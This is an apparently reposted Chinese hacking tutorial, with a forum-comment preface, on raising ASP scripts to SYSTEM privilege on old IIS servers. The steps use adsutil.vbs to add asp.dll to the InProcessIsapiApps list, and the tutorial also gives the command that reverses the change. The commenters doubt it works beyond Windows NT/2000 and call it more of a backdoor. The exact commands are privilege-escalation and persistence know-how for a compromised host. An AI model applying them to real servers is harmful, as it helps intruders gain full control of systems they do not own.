asp.dll 解析成 system 提升权限

站长评论：

    这文章非常老了，至少是“2005-04-15”以前的，有效性不敢恭维，以下是 T00ls 论坛的原帖回复（删减了一些无用的回复）：

    bloodsword（2008-10-9 02:13）：老早以前就听说过这个传说了，不过一直怀疑其可行性。在guest权限下把asp.dll提升到system权限，可能吗？

    else（2008-10-9 10:49）：在guest权限下把asp.dll提升到system权限，个人认为不大可能，guest本身权限不够，只能用管理员身份来把asp.dll提升到system权限。不过asp.dll提升到system权限后不就是说，只能得到webshell就可以搞定主机了，也给其它入侵者提供了方便？

    evildns（2008-11-19 10:03）：要有一定的条件的，我有些可以，有些不行。

    dingking（2008-11-27 22:49）：2K3系统的话，就算把ASP.DLL加进去也是没用的，一样不是SYSTEM权限。

    逗号（2009-4-16 21:10）：- -! 这是做后门用的，不是提权用的，提权根本不可能，而且这个是很老的文章了！

    jacksatan（2009-4-18 19:11）：如果是 fat32 格式分区的，应该可行。fat32 asp 可以执行执行 cmd，但加不了用户。但有替换文件权限，可以直接 copy shift 提权。

    friddy（2009-8-21 09:34）：cscript 在 webshell 是 guest 权限时，没有权限把 asp.dll 变成 system 权限。

    zczpc2000（2011-1-31 18:44）：WindowsNT 时代可以，到以后就必须 SYSTEM 权限才能干这事。

-------------------------------------------- 以下是原文 --------------------------------------------

网络上传统的提升asp权限为系统的有两种：

    1、图形化下的，把默认站点---->主目录--->应用程序保护设置为低，这样就可以把asp权限设置为system。但这种提升方法很容易被发现，所以网络有另一种一般是用adsutil.vbs来提升权限。而这个也是今天我要谈的关于adsutil.vbs提升权限。

    2、用adsutil.vbs搞定。

    在网络上我看到了很多的教你用这种方法的动画，文章，但我至今没有看到一篇介绍原理的，下面我谈谈我个人的看法：

先举个例子：

    有一群狗，这群狗里有几个长老级狗物，它们拥有着至高无上的权限，而其它的狗，他们的权限则少得可怜。

转到计算机上：

    在IIS中，有几个Dll文件是拥有特权限的，我们可以理解为系统权限，就像长老级的狗。而解析asp的asp.dll则就像一只普通的狗，他的权限少得可怜。

    那么，如果asp.dll也成了长老级的狗的话，那么asp不也就有了系统权限了吗，这是可以成立的。所以我们的思路也就是把asp.dll加入特权的dll一族之中。

提升步骤为：

    、先查看有特权一话有哪些。

    、加asp.dll加入特权一族。

    好了，下面我们就来实践这个过程。

    (1) 查看有特权的dll文件：

    命令为：cscript adsutil.vbs get /W3SVC/InProcessIsapiApps。

    得到显示为：

C:\Inetpub\AdminScripts>cscript adsutil.vbs get /W3SVC/InProcessIsapiApps
Microsoft (R) Windows 脚本宿主版本 5.1 for Windows
版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.
InProcessIsapiApps : (LIST) (5 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"

    看到没有，他说明的是有特权限一族为：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 这几个文件，不同的机子，可能会不同。

    (2) 把asp.dll加入特权一族：

    因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同)

    我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"

    好了，现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了，注意，用法中的get和set，一个是查看一个是设置。还有就是你运行上面的你要到C:\Inetpub\AdminScripts>这个目录下。

    那么如果你是一个管理员，你的机子被人用这招把asp提升为system权限，那么，这时，防的方法就是把asp.dll T出特权一族，也就是用set这个命令，覆盖掉刚才的那些东东。

    例：cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll"

    这样就可以了，当你再用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 这个语句查之时，如果没有看见asp.dll，说明，asp的权限又恢复到以前的权限。

文章来源于lcx.cc:asp.dll 解析成 system 提升权限